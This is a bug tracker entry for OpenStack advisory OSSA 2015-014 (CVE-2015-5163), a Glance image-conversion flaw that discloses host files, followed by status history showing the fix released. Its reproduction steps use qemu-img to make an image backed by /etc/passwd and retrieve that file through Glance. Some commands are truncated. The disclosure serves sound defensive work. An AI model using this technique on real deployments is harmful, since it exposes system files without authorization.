[OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Glance |
Fix Released
|
Critical
|
Flavio Percoco | ||
Kilo |
Fix Released
|
Undecided
|
Unassigned | ||
OpenStack Security Advisory |
Fix Released
|
Critical
|
Tristan Cacqueray |
Bug Description
This is a security flaw that allows files from the Glance host to be obtained by a user.
I'm using the Glance file store and have set in /etc/glance/
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_
Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/
$ glance --os-image-
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>
This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
qemu-img convert -O raw file://
Similar to Cinder bug 1415087.
CVE References
Changed in ossa: | |
status: | Incomplete → Confirmed |
importance: | Undecided → Critical |
summary: |
- Format-guessing and file disclosure via image conversion + Format-guessing and file disclosure via image conversion (CVE-2015-5163) |
Changed in ossa: | |
status: | Confirmed → Fix Committed |
information type: | Private Security → Public Security |
summary: |
- Format-guessing and file disclosure via image conversion (CVE-2015-5163) + [OSSA 2015-014] Format-guessing and file disclosure via image conversion + (CVE-2015-5163) |
description: | updated |
Changed in ossa: | |
status: | Fix Committed → Fix Released |
Changed in glance: | |
status: | Fix Committed → Fix Released |
Changed in glance: | |
milestone: | liberty-3 → 11.0.0 |
Oops... clearly meant to report this to the Glance project.